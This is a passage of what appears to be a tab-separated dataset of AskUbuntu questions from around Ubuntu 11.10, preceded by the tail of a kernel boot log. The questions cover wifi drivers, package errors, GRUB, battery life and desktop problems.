regulatory rule : [ 28.172719 ] cfg80211 : 2457000 khz - 2482000 khz @ khz ) , ( 300 mbi , 2000 mbm ) [ 28.172721 ] cfg80211 : updating information on frequency 2484 mhz for a 20 mhz width channel with regulatory rule : [ 28.172723 ] cfg80211 : 2474000 khz - 2494000 khz @ khz ) , ( 300 mbi , 2000 mbm ) [ 28.181814 ] ieee80211 phy0 : selected rate control algorithm 'ath9k_rate_control ' [ 28.182313 ] cfg80211 : calling crda for country : cn [ 28.182369 ] registered led device : ath9k-phy0 [ 28.182373 ] ieee80211 phy0 : atheros ar9280 rev:2 mem=0xffffc90001b20000 , irq=17 [ 28.184804 ] cfg80211 : updating information on frequency 2412 mhz for a 20 mhz width channel with regulatory rule : [ 28.184807 ] cfg80211 : 2402000 khz - 2482000 khz @ khz ) , ( n/a mbi , 2000 mbm ) [ 28.184809 ] cfg80211 : updating information on frequency 2417 mhz for a 20 mhz width channel with regulatory rule : [ 28.184812 ] cfg80211 : 2402000 khz - 2482000 khz @ khz ) , ( n/a mbi , 2000 mbm ) [ 28.184814 ] cfg80211 : updating information on frequency 2422 mhz for a 20 mhz width channel with regulatory rule : [ 28.184816 ] cfg80211 : 2402000 khz - 2482000 khz @ khz ) , ( n/a mbi , 2000 mbm ) [ 28.184818 ] cfg80211 : updating information on frequency 2427 mhz for a 20 mhz width channel with regulatory rule : [ 28.184821 ] cfg80211 : 2402000 khz - 2482000 khz @ khz ) , ( n/a mbi , 2000 mbm ) [ 28.184823 ] cfg80211 : updating information on frequency 2432 mhz for a 20 mhz width channel with regulatory rule : [ 28.184825 ] cfg80211 : 2402000 khz - 2482000 khz @ khz ) - 2482000 khz @ 40000 khz ) , ( n/a , 2000 mbm ) [ 28.184871 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( n/a , 3000 mbm ) [ 28.237872 ] addrconf ( netdev_up ) : wlan0 : link is not ready [ 28.347718 ] lp : driver loaded but no devices found [ 28.366220 ] ppdev : user-space parallel port driver [ 28.467369 ] 3:3:4 : can not set freq 48000 to ep 0x86 [ 29.469668 ] 3:3:4 : can not set freq 48000 to ep 0x86 [ 29.728231 ] cfg80211 : found new beacon on frequency : 2472 mhz ( ch 13 ) on phy0 [ 30.468086 ] 3:3:4 : can not set freq 48000 to ep 0x86 [ 31.467038 ] 3:3:4 : can not set freq 48000 to ep 0x86 [ 32.464915 ] 3:3:4 : can not set freq 48000 to ep 0x86 [ 33.463344 ] 3:3:4 : can not set freq 48000 to ep 0x86 [ 34.461643 ] 3:3:4 : can not set freq 48000 to ep 0x86 [ 34.777120 ] eth1 : no ipv6 routers present [ 35.460069 ] 3:3:4 : can not set freq 48000 to ep 0x86 [ 36.458651 ] 3:3:4 : can not set freq 48000 to ep 0x86 [ 37.456851 ] 3:3:4 : can not set freq 48000 to ep 0x86 [ 38.455273 ] 3:3:4 : can not set freq 48000 to ep 0x86 [ 39.453753 ] 3:3:4 : can not set freq 48000 to ep 0x86 [ 40.452140 ] 3:3:4 : can not set freq 48000 to ep 0x86 [ 41.450457 ] 3:3:4 : can not set freq 48000 to ep 0x86 [ 42.449083 ] 3:3:4 : can not set freq 48000 to ep 0x86 [ 43.447342 ] 3:3:4 : can not set freq 48000 to ep 0x86 [ 44.445676 ] 3:3:4 : can not set freq 48000 to ep 0x86 [ 44.587162 ] jfs : ntxblock = 8192 , ntxlock = 65536 [ 44.632652 ] sgi xfs with acls , security attributes , realtime , large block/inode numbers , no debug enabled [ 44.633366 ] sgi xfs quota management subsystem [ 45.444276 ] 3:3:4 : can not set freq 48000 to ep 0x86 [ 101.004203 ] ntfs driver 2.1.30 [ flags : r/o module ] . [ 101.035285 ] qnx4 filesystem 0.2.3 registered . [ 289.523592 ] ce : hpet increased min_delta_ns to 20113 nsec [ 647.448669 ] usb 2-1.8 : usb disconnect , device number 9 [ 648.982277 ] usb 2-1.7 : usb disconnect , device number 8 [ 657.672724 ] usb 2-1.3 : usb disconnect , device number 5 [ 658.686681 ] r8169 0000:04:00.0 : eth1 : link down [ 658.695127 ] usb 2-1.4 : usb disconnect , device number 6 [ 660.947609 ] r8169 0000:04:00.0 : eth1 : link up [ 662.529012 ] usb 2-1.2 : usb disconnect , device number 4 [ 664.660117 ] r8169 0000:04:00.0 : eth1 : link down [ 666.223675 ] r8169 0000:04:00.0 : eth1 : link up [ 768.544851 ] usb 2-1.7 : new low speed usb device number 10 using ehci_hcd [ 768.645799 ] input : logitech usb receiver as /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.7/2-1.7:1.0/input/input12 [ 768.645934 ] logitech 0003:046d : c517.0009 : input , hidraw3 : usb hid v1.10 keyboard [ logitech usb receiver ] on usb-0000:00:1d.0-1.7/input0 [ 768.651054 ] logitech 0003:046d : c517.000a : fixing up logitech keyboard report descriptor [ 768.651724 ] input : logitech usb receiver as /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.7/2-1.7:1.1/input/input13 [ 768.651935 ] logitech 0003:046d : c517.000a : input , hiddev0 , hidraw4 : usb hid v1.10 mouse [ logitech usb receiver ] on usb-0000:00:1d.0-1.7/input1 [ 773.788397 ] usb 2-1.1 : reset high speed usb device number 3 using ehci_hcd [ 774.102287 ] snd-usb-audio 2-1.1:1.2 : no reset_resume for driver snd-usb-audio ? [ 774.102293 ] snd-usb-audio 2-1.1:1.3 : no reset_resume for driver snd-usb-audio ?
106745	how to find out if my card supports infrastructure mode ?	my android does n't see adhoc networks so i can not share internet to my phone that way . i heard of making a network in infrastructure mode , and i am wondering how to find out if my card supports it .
106750	what 's being done to make lenses be easily available to users ?	this is not strictly a question and if it does not meet the criteria for entries on askubuntu , it should be deleted . however , i have been thinking on this for a while and thought this would be the best place to get the most eye balls on it . i believe ubuntu is on to something truly unique with the whole lenses and scopes idea . there has been a surge of third party lenses and scopes for doing all sorts of things over the past few months and i believe this is only the beginning . however , one major hindrance is the fact that there is no easy way to discover and install the lenses . one has to follow ubuntu blogs to find out about them , and then add their individual ppa 's in order to be able to install them . i suggest that a section should be created for them on the ubuntu software center and the usc can even feature some of them from time to time in order to provide much needed visibility for the third party lenses .
106754	why we ca n't run commands with gnome shortcuts ?	when i make a custom shortcut with gnome ( gnome-control-center keyboard ) i ca n't set it to a command . why ? example : i ca n't set a shortcut for sudo apt-get update . instead i must first invoke a graphical terminal , then bash , then execute the command ( something like : gnome-terminal -e `` bash -c \ '' sudo apt-get update ; exec bash\ '' '' also is there another ( better ) workaround ?
106756	how many lenses can the dash menu handle	i wonder this since there is a max amount of space there . if i install multiple lenses , will it slow down the dash menu , can i horizontal scroll to see other lenses available ?
106757	apt-get is giving me errors	when i run sudo apt-get update & & sudo apt-get dist-upgrade , i get the following : w : failed to fetch cdrom : //ubuntu 11.10 _oneiric ocelot_ - release i386 ( 20111012 ) /dists/oneiric/main/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms w : failed to fetch cdrom : //ubuntu 11.10 _oneiric ocelot_ - release i386 ( 20111012 ) /dists/oneiric/restricted/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms w : failed to fetch http : //ppa.launchpad.net/openjdk/ppa/ubuntu/dists/oneiric/main/source/sources 404 not found w : failed to fetch http : //ppa.launchpad.net/openjdk/ppa/ubuntu/dists/oneiric/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead .
106769	scanning from terminal	i want to be able to scan from the terminal and then send the scanned output to a specific directory . can this be done from the terminal .
106770	take a picture from terminal	i want to be able to take a picture using the webcam from the terminal . this image then will be send to a specific directory . how can this be done .
106771	what is causing `` failed to initialize geis instance aborted '' when trying to run touchegg in ubuntu 11.10	what is causing `` failed to initialize geis instance aborted '' when trying to run touchegg in ubuntu 11.10 ? i am trying to enable more gesture options for my mac-book touch pad on ubuntu 11.10 , and have come across the touchegg project . i have installed it but when i try to run touchegg from the command line i get the error i described earlier . does anyone know what is causing this , or even better , how to fix it ? thanks !
106774	ppa error in ubuntu 11.10	i am getting the following errors when i try to use a ppa : ~ $ sudo add-apt-repository ppa : freefilesync/ffs [ sudo ] password for ***** : you are about to add the following ppa to your system : freefilesync releases this is the official freefilesync repository for ubuntu . it is recommended to use this to keep your freefilesync tool easily updated . for instuctions on how to add the repository , see http : //www.dlecan.com/archives/56-how-to-install-freefilesync-on-ubuntu-ppa.html or ( fr ) http : //doc.ubuntu-fr.org/freefilesync . more info : https : //launchpad.net/~freefilesync/+archive/ffs press [ enter ] to continue or ctrl-c to cancel adding it exception in thread thread-1 : traceback ( most recent call last ) : file `` /usr/lib/python2.7/threading.py '' , line 552 , in __bootstrap_inner self.run ( ) file `` /usr/lib/python2.7/dist-packages/softwareproperties/ppa.py '' , line 95 , in run self.add_ppa_signing_key ( self.ppa_path ) file `` /usr/lib/python2.7/dist-packages/softwareproperties/ppa.py '' , line 107 , in add_ppa_signing_key print `` error reading % s : % s '' % ( lp_url , e [ 1 ] ) nameerror : global name 'lp_url ' is not defined how to fix it ? i use ubuntu 11.10 . thanks
106778	my fan is deafening - please help , i googled and googled to no avail [ vaio laptop ]	- greetings to all helpful ubuntu gurus - i 'm using a vaio vpc eb100c laptop with an ubuntu 11.10 os running on it [ 64bit ] and i 'm having grave issues with my fan - it runs non stop . i doubt that it is normal for my fan to run at full speed for just booting my system and fancying my desktop background without doing anything else ... the vaio fan support was a huge letdown as my series was n't supported - i tried to configurate the fan intervals - followed a tutorial on fancontrol , installed lm-sensors and tried pwmconfig which gave me the : '' /usr/sbin/pwmconfig : there are no pwm-capable sensor modules installed `` error . i looked into similar threads , tutorials and manuals without luck - i 'm not even sure if the underlying problem is n't the fan control at all but a performance issue but then again why would i need so much cpu for nothing ? [ 50째c while doing nothing ] i found out that there 's little to no vaio/ubuntu support at all and would be glad for any help availale ; i 'd appreciate a silent working atmosphere while browsing - thanks in advance
106788	what are the requirements to have unity 3d running/available	what are the hardware requirements to have so that unity 3d will be available and work when starting ubuntu .
106793	gimp wo n't start up due to a missing libgegl	i currently run ubuntu 11.10 , i installed gimp 2.6.12 , it installed fine . i went to click on the gimp icon after installation and nothing happens . i open a picture and select gimp as the application to use on it and nothing happens . i uninstalled and reinstalled the software and the same thing , icon is there and nothing happens when i click on it . any help would be appreciated . when i open it in a terminal i get this error : gimp : error while loading shared libraries : libgegl-0.0.so.0 : can not open shared object file : no such file or directory
106795	how to configure ubuntu 's calendar event to open thunderbird	i am trying to configure the add event ... option in the calendar offered by ubuntu to open thunderbird . i am already using the latest thunderbird and have updated ubuntu but still when trying to add an event it will try to open the even in evolution . how can i open the events in thunderbird .
106797	what type of installed/updated packages recommend the option to reboot	sometimes when updating or installing a package , ubuntu recommends to reboot the pc . the blue circle arrow appears . what type of packages do this and why ?
106801	how to install and update ubuntu to a pen drive	i want to install ubuntu into a pen drive . the pen drive is 16gb and i want to be able to boot from it ( not the livecd but the actual installed system ) and be able to update and install new packages . at the end i want to be able to have the latest firefox , apache , mysql , php installed and an updated ubuntu in it . i have read several questions but they are all how to install ubuntu from a pen drive . i want to install it to a pen drive .
106802	saving ubuntu 10.04 operating system on disk , with windows 7 theme	hi all : ) i have installed ubuntu 10.04 with wubi , and was wondering if there is a way to save it as an iso or os disk ? i have added the windows 7 theme to it , and its really great ! ! i copied and pasted from the internet to the terminal for the windows 7 theme , and would love to save the whole setup for other computers in case that theme is no longer available etc . i always liked windows , but hate the bloat and virus 's so this is a perfect fit for me . thanx in advance , chris
106805	how do i get imagej to work with oneric 11.10 64-bit with openjdk-7 ?	i 'm not sure why i ca n't get imagej ( http : //imagej.nih.gov/ij/index.html ) to start on my computer running oneiric 64-bit . sudo apt-get install imagej installation is fine , but it wo n't start ( not even in the terminal , and there is no error output ) . the version in the repos looks to be the same as the one on the site . i 'm using openjdk-7 , so i wonder if this is the problem . edit : filed a bug report https : //bugs.launchpad.net/ubuntu/+source/imagej/+bug/941087
106810	possibility to use 2 or more ubuntu pcs to share the same work	i was wondering if it is possible to share the resources between several pcs to do a common work . for example rendering a video/image or compiling something . my question is more for the desktop ubuntu but if it is not possible then the server version then . this is in regards with recent and updated versions of ubuntu . what i mean with this is 11.10 and above .
106811	adobe flash alternative for ubuntu 11.10 64 bit	since adobe has decided to discontinue support for flash in linux , what does that mean for us ubuntu fanboys and what alternatives are available to us ?
106813	screen sharing not painting properly on client	i can not get the screen sharing utility in ubuntu 11.10 to work properly . when i connect , i get the initial screen , but no updates . when i connect to my ubuntu box via a laptop , i can see the mouse moving , but when i click on anything , the screen does not update . i can disconnect , reconnect and then see the updated screen , but it does not automatically refresh . how do i fix it ?
106817	the color-coding of file types in my terminal has stopped , help ?	i was messing around in the terminal earlier and the way file types and directories are color coded has stopped . now when i pull up a list of all files in a directory , they are all white . what happened ?
106818	how to change the ubuntu source code	i have heard that we can obtain the source code of ubuntu and customize it as we wish . but where can i find the source code of ubuntu , and what languages are used to write ubuntu ?
106830	not recognizing partitioned hard-drive	right , here 's the situation . i 'm experimenting for the first time , so please bear with me . google has shown no such solutions . lenovo w500 laptop . i have my primary hard drive , which is where i keep windows and my windows applications . i also have a secondary hard drive in the cd bay of my laptop . this is where i keep my windows files , and where i told wubi to put ubuntu . boot up ubuntu . i like it . now i want to listen to music and mess around with my pictures . except ubuntu refuses to recognize the hard drive that it is ( supposedly ) on . solutions ? thanks thanks uri . for others : files are found in /host under system files .
106832	can i keep files ' revision history ?	i am looking to purchase additional storage . however what is important to me is that once i have synced data to the cloud , that if i delete the file locally , it does not get deleted in the cloud . is this possible with ubuntuone ? additonally i note that i can only sync data from c : /user/nick/documents etc . i need to be able to sync data from drives other than c : in windows . using ubuntu i can select what every directories i want . on my windows machine drive c : is an ssd drive and therefor i do not keep data on there . please can you give me some indication when this restriction on windows will be lifted . i have multiple machines 2 x ubuntu 10.10 , 2 x windows 7 ultimate a samsung tablet and an htc android phone . all deveices need to be able to send and receive data to the cloud storage .
106837	update manager always says it is outdated	though it installs updates , it always says the update information is some days old and the number of days is increasing daily . i think it keeps on installing some updates repeatedly like google chrome beta ( approx . 31 mb ) .
106839	login loop problem	i have looked all over at a lot of different threads regarding this problem and nothing has worked , so i 'm hoping i can get some help by maybe providing some info specific to my setup . i 'm running ubuntu 11.10 64-bit with an nvidia quadro 1000m card . my installation was working just fine today until i changed something with xorg.conf and then i was n't able to boot into ubuntu because it would get stuck at the splash screen . i made it into tty and was able to log in and start xorg manually via startx . then i rebooted and now i 'm looping in the login screen . i 've tried regenerating xorg.conf using nvidia-xconfig , and i 've tried deleting xorg.conf altogether . neither helps . basically what 's happening is , after i entry my password i begin to log in , then the screen goes black and shows some terminal output , then before i can read the output the nvidia splash screen goes up and i 'm back to the login screen . if i go back into tty and kill xorg , it does the same thing : nvidia splash , then login screen . is there any other information i can provide ? anything i can try to get this working ?
106843	starting problem	i am using dell vostro 1014 laptop , with ubuntu 10.04 operating system . every time , when i start laptop , first , there opens 3-4 windows , such as `` desktop , terminal , openoffice '' . i have to close them first , and then start my work on laptop . how can solve this problem ?
106845	text editor with ftp	i 'm new to ubuntu . is there a text editor with built in ftp out there that anyone can recommend to me ? i am trying to use bluefish right now .
106846	grub fatal error during installing to external hard drive ( sdb )	so i worked out a proper way to partition the external hard drive ( see link below ) and do the right partitions for ubuntu . however during the install not far from the end , it says the grub or boot loader failed to install . i try selecting sdb1 partition of the external hard drive which i selected for /boot ( which sounds obvious to do that with ... ) but still fatal errors and ca n't install . i 'm using intel core 2 duo mac and booted into the install cd/dvd . here 's the tutorial i found on this site : install ubuntu 11.04 on external hard disk like the tutorial i did it like this : sdb1 was /boot , 258mb and ext2 file system sdb2 was swap , 8gb ( double my ram ) sdb3 was / for root , 10gb and ext4 file system sdb4 was /home , my remainding space from 2tb and ext4 filesystem hope this helps you help me : ) please need help : )
106847	how do i set windows to boot as default in the boot loader ? unable to locate theme engine ?	using this how-to how do i set windows to boot as the default in the boot loader ? i was able to get as far as here , however when i try to type in gksu gedit /etc/default/grub i am given 4 lines repeating the same message : ( gksu:2022 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' please help
106849	how to copy from one buffer to another in gstreamer ?	i am trying to copy from the original buffer buf ( in the chain function ) to another buffer created using : gstbuffer *buffer ; glong size ; size = gst_buffer_size ( buf ) ; buffer = gst_buffer_new ( ) ; gst_buffer_size ( buffer ) = size ; gst_buffer_mallocdata ( buffer ) = g_malloc ( size ) ; gst_buffer_data ( buffer ) = gst_buffer_mallocdata ( buffer ) ; memcpy ( buffer , buf , size ) ; but i get a segmentation fault . is there anything wrong here ?
106852	desktop icon problems with rotated unity	i have an odd problem that i 'm attributing to the rotated unity plugin . i ca n't move any desktop icons any further than where it lies on the left in the following screenshot : that `` barrier '' is where the old launcher used to be . however , observe the next screenshot : here , you can see that the icon can go down into the launcher . i think that the old settings for the normal launcher are implicated though the plugin moved the launcher itself . any ideas ? thanks all . i 'm still a linux novice , and you all helping me means alot .
106854	update-alternatives : error : alternative path /lib/plymouth/themes/lmint/lmint.plymouth does n't exist	when i use sudo apt-get install i get the following errors when installing any package : ( this example is while installing gnome extensions ) reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : libdbusmenu-qt2 : i386 libatk1.0-0 : i386 libxcomposite1 : i386 ruby-text-format ruby-activesupport-2.3 libwrap0 : i386 nspluginwrapper libsamplerate0 : i386 libi18n-ruby libbuilder-ruby rake libjack-jackd2-0 : i386 libnspr4-0d : i386 libcairo2 : i386 libjs-prototype libmemcache-client-ruby1.8 ruby-actionmailer-2.3 sni-qt : i386 libmemcache-client-ruby ruby-activerecord-2.3 ruby-rchardet libdatrie1 : i386 libjson0 : i386 libyaml-0-2 libgdk-pixbuf2.0-0 : i386 libpixman-1-0 : i386 ruby-tmail libjs-scriptaculous libxinerama1 : i386 nspluginviewer : i386 libxft2 : i386 libbuilder-ruby1.8 libspeexdsp1 : i386 libthai0 : i386 libasound2 : i386 libflac8 : i386 librack-ruby libtzinfo-ruby1.8 libvorbisenc2 : i386 ruby-rails-2.3 libasyncns0 : i386 libjasper1 : i386 librack-ruby1.8 ruby-activeresource-2.3 libtzinfo-ruby libruby1.9.1 libpango1.0-0 : i386 libpulse0 : i386 libxcb-render0 : i386 libvorbis0a : i386 libxcursor1 : i386 libxcb-shm0 : i386 libxv1 : i386 libi18n-ruby1.8 ruby-actionpack-2.3 libxrandr2 : i386 libnss3-1d : i386 libsndfile1 : i386 libgtk2.0-0 : i386 libasound2-plugins : i386 libogg0 : i386 use 'apt-get autoremove ' to remove them . the following new packages will be installed : gnome-shell-extensions-windows-navigator 0 upgraded , 1 newly installed , 0 to remove and 2 not upgraded . 4 not fully installed or removed . need to get 7,290 b of archives . after this operation , 73.7 kb of additional disk space will be used . get:1 http : //ppa.launchpad.net/ferramroberto/gnome3/ubuntu/ oneiric/main gnome-shell-extensions-windows-navigator all 3.2.0-1~lffl~oneiric~ppa [ 7,290 b ] fetched 7,290 b in 0s ( 15.1 kb/s ) selecting previously deselected package gnome-shell-extensions-windows-navigator . ( reading database ... 267839 files and directories currently installed . ) unpacking gnome-shell-extensions-windows-navigator ( from ... /gnome-shell-extensions-windows-navigator_3.2.0-1~lffl~oneiric~ppa_all.deb ) ... setting up plymouth-theme-lmint ( 0.5.0-1 ) ... update-alternatives : error : alternative path /lib/plymouth/themes/lmint/lmint.plymouth does n't exist . dpkg : error processing plymouth-theme-lmint ( -- configure ) : subprocess installed post-installation script returned error exit status 2 setting up plymouth-theme-mib-oxygen ( 0.5.0-1 ) ... update-alternatives : error : alternative path /lib/plymouth/themes/miboxygen/miboxygen.plymouth does n't exist . dpkg : error processing plymouth-theme-mib-oxygen ( -- configure ) : subprocess installed post-installation script returned error exit status 2 setting up plymouth-theme-mib-ubuntu ( 0.5.0-2 ) ... update-alternatives : error : alternative path /lib/plymouth/themes/mib-ubuntu/mib-ubuntu.plymouth does n't exist . dpkg : error processing plymouth-theme-mib-ubuntu ( -- configure ) : subprocess installed post-installation script returned error exit status 2 setting up plymouth-theme-spinfinity-ubuntu-women ( 0.5.0-2 ) ... update-alternatives : error : alternative path /lib/plymouth/themes/plymouth-theme-spinfinity-ubuntu-women/spinfinity-ubuntu-women.plymouth does n't exist . dpkg : error processing plymouth-theme-spinfinity-ubuntu-women ( -- configure ) : subprocess installed post-installation script returned error exit status 2 setting up gnome-shell-extensions-windows-navigator ( 3.2.0-1~lffl~oneiric~ppa ) ... no apport report written because maxreports is reached already errors were encountered while processing : plymouth-theme-lmint plymouth-theme-mib-oxygen plymouth-theme-mib-ubuntu plymouth-theme-spinfinity-ubuntu-women e : sub-process /usr/bin/dpkg returned an error code ( 1 ) ** i also get errors installing from ubuntu software center along the lines that the installation failed but package still shows as installed . i believe the errors are caused from installing plymouth-manger to manage the splash screen themes . any help getting rid of this pesky error would be much appreciated !
106856	how to add gmail account with 2-step verification in empathy ?	i 've added gmail account in gwibber/empathy chat previously . now i 've activated 2-step verification in google settings , and when i am entering the correct username and passwords , gwibber now reports that authentication failed . i 'm on ubuntu 11.10 with empathy 3.2.0.1 .
106857	how to install gnome2 on lubuntu11.10	now i am running lubuntu11.10 , which is based on lxde , i want to install gnome2 on lubuntu , iow , i want to have both gnome2 and lxde on it . i googled for some time . and i got some commands such as sudo apt-get install ubuntu-desktop , sudo apt-get install gnome-core etc . i tried the first one ubuntu-desktop , but when i finished installing it , i found it was desktop based on gnome3 ! now i have uninstalled it . can anyone tell me how to install gnome2 on lubuntu11.10 ? thx a million !
106858	deb installation and man in the middle attack	is the deb installation process protected against man in the middle attacks that would alter the install script ? it seems if not , then it would be possible for a man in the middle attack to place code that fundamentally alters the system in the deb install script . because all installations require root privileges , the invitation is wide open for exploits . would we be better off not using custom deb installing scripts as root ? i know that links , shortcuts , and app directories need to be copied as root . this could be done by a script already residing on ubuntu and shipping with ubuntu . the deb should fit it 's expected protocol . it would simply hand it places to move files from the package and appropriate shortcut creation locations , etc . it would have restrictions to never delete , rename , without explicit approval ( for updating apps ) . if the deb file never asked to be run as root , then an installation could never compromise fundamental parts of the system .
106860	how do i fix my .desktop files in /usr/share/applications ?	i do n't want to go too deeply into the issue , but i deleted some of the nautilus-related .desktops in /usr/share/applications . what all should i have in the folder ? i have : nautilus-autorun-software.desktop nautilus.desktop~ nautilus-folder-handler ( copy ) .desktop nautilus-folder-handler ( copy ) .desktop~ nautilus-folder-handler.desktop~ nautilus-home.desktop~ my reason for asking is that my biggest problem occurs when using the dash search . if i search for `` documents '' , `` videos '' , etc . folders , they are unclickable . i think i may have broken something related to these files . any help ? edit : i used my liveusb , copied the nautilus-related files to my install , and now it works . however , i have another problem with my dash search : i have 2 `` downloads '' ... both work , but having two kind of bugs me . any ideas ?
106863	is there software to manage the laptop 's touchpad ?	i was looking for software to manage touchpad and mouse and i found synaptiks but it dos n't work properly ! ! for example i want to my laptop 's tochpad been disable when i use a mouse but it does n't happen with this software ! ! do others have this problem ? is there any other softwares that works well ? thanks .
106864	how do i remove selinux ?	how do i remove selinux in ubuntu server 10.04 as the config file is not located in /etc/selinux and the folder /selinux is empty ?
106865	compiling an rt3062 pci wireless driver	i have an ralink wifi card installed . the driver shipped with ubuntu 11.10 does not appear to run my card . on the ralink website there is a source download for compiling the driver but being new to linux i dont understand exactly what i am supposed to do , i understand that i need to use make to compile the driver . what i dont understand is the files listed in the readme for the download . if i post the code from the two files it states to edit ( they have stated its distributable ) can somebody please take a look at it . or if you want to download the driver source and take a look yourself this is the link to it http : //www.ralinktech.com/en/04_support/license.php ? sn=5019 ( download form ) http : //www.ralinktech.com/en/04_support/support.php ? sn=501 ( downloads list page ) rt3062pci/mpci/cb/pcie ( rt3060/rt3062/rt3562/rt3592 ) specific driver as you can see they have not made it simple there are several driver versions that can be compiles from this one package , and this is whats causing me the problems i know which version i need to use , 3062 but i dont know what to edit in the two files to compile that driver . if you want me to post the code instead of downloading it reply and i will get back to you later this evening when i am back home .
106870	ubuntu one stopped synchronizing an important folder during downloading from the cloud	i formatted my computer yesterday and wanted to download all the folders i 've been working on back . those folders were synchronized to ubuntu one but the problems are that during the process of synchronizing , my brother messed up with my computer and stupidly pressed `` stop synchronizing this folder '' ! then i found out that the folder i 've been downloading stopped the process and the ubuntu one space that supposed to be used were freed . is there any way for me to call those not-yet-synchronized files back ? it 's very important , i must use them for my graduation thesis .
106876	i want to change my administrator password but am receiving an error '' manipulation token authentication error ''	i want to change my ubuntu 11.10 administrator account password but when i am about to do so , i get an error that `` passwd : manipulation token authentication error '' and then in the next statement get '' passwd : password unchanged '' ... so can anyone help me out by finding a solution to this problem ?
106878	how do i disable all sounds ?	in windows there is an option call no sounds . is there anything like that in unity / ubuntu 11.10 ? i do n't ever never want a system kind of sound .
106883	save url to disk in chrome ( under xfce 4.8 )	how can i save a url in google chrome running under xfce 4.8 ? there is no `` save url '' option under the wrench menu and dragging the favicon simply does n't work . edit : i do n't want to bookmark the url , i want to save it on the disk ( like in windows : ) .
106884	access vpn from home is fine but not outside via 3g	i 'm a real ubuntu newbie but at the school where i work i managed to install ubuntu then install pptpd . i was feeling very pleased with myself when last evening from home with my apple iphone through my wi-fi , i was able to connect and access all resources on the network . same thing with my mac . however , when i turned off the wi-fi on my phone and tried to access through 3g it did n't work . when i had a `` proper '' vpn server installed at school it worked fine so i ca n't see that it 's my network provider turning off vpn ... anyone any ideas ? btw - the commands that seemed to make the difference on connecting to all resources seems to be the following : sudo iptables -t nat -a postrouting -0 eth0 -j masquerade sudo sysctl net.ipv4.ip_forward=1
106887	maximum 5 minute battery life with ubuntu 11.10 on hp laptop	i apologise if this question is too similar to the numerous others already asked , but it seems that my difference in battery life is significantly more noticeable than others that have been reported . i recently installed ubuntu 11.10 on my hp pavilion dv6 laptop ( which i purchased brand new just under one year ago ) . when running windows 7 on this laptop , i have been able to get up to two and a half to three hours of battery life with wireless disabled and when running only microsoft word . however , when running ubuntu , i am unable to use the laptop if it is not plugged in . upon unplugging the fully-charged machine from the power cord , if i have wireless enabled , i immediately receive a notification that the battery levels are critically low and that shutdown is imminent . even if i replace the power plug , the laptop shuts down within thirty seconds . if i disable wireless capability , i am able to run the laptop for an absolute maximum of five minutes on battery powers before receiving the same message . i have tried running with jupiter on power saver mode , but to no noticeable effect . ignoring the fact that i ca n't use my laptop without being attached to a power source , i really do enjoy using ubuntu , and hence would greatly appreciate any help that can be offered .
106888	applications keep showing up twice on the launcher	i just did a fresh install of 11.10 desktop 64-bit . when trying to add some new application to the launcher weird things are happening . the problem in the following : i tried opening a terminal from the dash . when the terminal icon appeared in the launcher , i chose keep in launcher . then i close the terminal . as expected the terminal icon is still in the launcher . so far so good . now , if i open a terminal using the launcher , a second terminal icon appears , and stays after closing . if i open terminal again , a third will appear and so on . screenshot : the same happens with other applications that were not initially in the launcher , but not with the original ones , like ubuntu one . update : the problem can be solved by logging out and in again every time i add a new icon to the launcher . it 's definitely a bug . i shall report it . update 2 : bug reported
106893	printer drivers on konica minolta pp 1350e	i had an older printer but ca n't find drivers . on oficial konica web they do n't have drivers for linux and in google i had n't found any . any help ? thanks
106894	how do i port a freebsd daemon to ubuntu ?	i had a freebsd machine and it had a /usr/sbin/daemon command which could run my program in the background . the question is how to do something similar in ubuntu ? i would like something i can put in a startup script . what i mean is my program ca n't put itself in a background when starts . i tried : start-stop-daemon -- start -- quiet -- pidfile $ pidspath/ $ pidfile -- exec $ daemon but it just starts the program and i must wait for it to finish .
106899	slow resume after suspend having chrome running with many tabs	i usually use chrome and firefox for browsing . i also open many tabs ( around 40 in both some times ) . the problem i have occurs when i resume the pc after having suspended it : it takes from 2 to 5 minutes sometimes to just get back normally . does this have to do with memory usage not properly resuming ? is it a bug in chrome/firefox or ubuntu itself ? note that i just upgraded from 10.10 to 11.10 and i was having the problem on both releases , which makes me guess that it has to do with ubuntu not resuming well if some memory-heavy apps were running before the suspend occured .
106905	how to replace mutter with compiz to enable wobbly effect ?	i 'm running ubuntu 11.10 with gnome shell , because unity is too slow . is there a way i can enable extra visual effects which i had in lucid lynx ? how can i replace my windows managers ? i prefer to use gnome 3 or gnome classic if compiz works . thanks !
106911	ca n't mount cds after failed brasero burn	brasero failed to burn a disk recently , and now i ca n't access cd-roms . even cd-rs are not not showing . using ubuntu 11.10 on a dell d510 lattitude laptop . allan @ allan-latitude-d510 : ~ $ cdrecord -checkdrive device was not specified . trying to find an appropriate drive ... detected cd-r drive : /dev/cdrw using /dev/cdrom of unknown capabilities device type : removable cd-rom version : 5 response format : 2 capabilities : vendor_info : 'tsstcorp' identification : 'dvd+-rw ts-l532b' revision : 'de04' device seems to be : generic mmc2 dvd-r/dvd-rw . using generic scsi-3/mmc cd-r/cd-rw driver ( mmc_cdr ) . driver flags : mmc-3 swabaudio burnfree supported modes : tao packet sao sao/r96p sao/r96r raw/r96r my cd drive is now useless , and any help on getting it to read/burn would be appreciated .
106913	table rendering in ubuntu firefox	i need to input sports result data on a website quite regularly . the table appears offset in ubuntu ( using firefox and chrome ) ie the input boxes do not match with the vertical input descriptions . consequently , the table is longer than it should be and the input boxes do n't match up with the input descriptions . this does not happen on my arch box - the table renders perfectly . i do n't know where to start looking for a solution to this problem . arch is currently using firefox 10 but this problem has been present for quite a number of months and version upgrades of firefox . what happens is this : there are two input cells side by side ( where i add results of football ( association ) matches . these cells align with a team name eg team one [ input 1 ] [ input 2 ] team two [ input 1 ] [ input 2 ] firefox in arch renders the page as intended . the input cells are aligned with the team names . this also works in firefox in windows . in ubuntu , the cells are displayed on top of each other : team one [ input 1 ] [ input 2 ] this , unfortunately , causes the input boxes to become misaligned ie they are no longer next to the team they are associated with . team one [ input 1 ] team two [ input 2 ] [ input 1 ] [ input 2 ] matching teams with the correct input boxes becomes a nightmare . 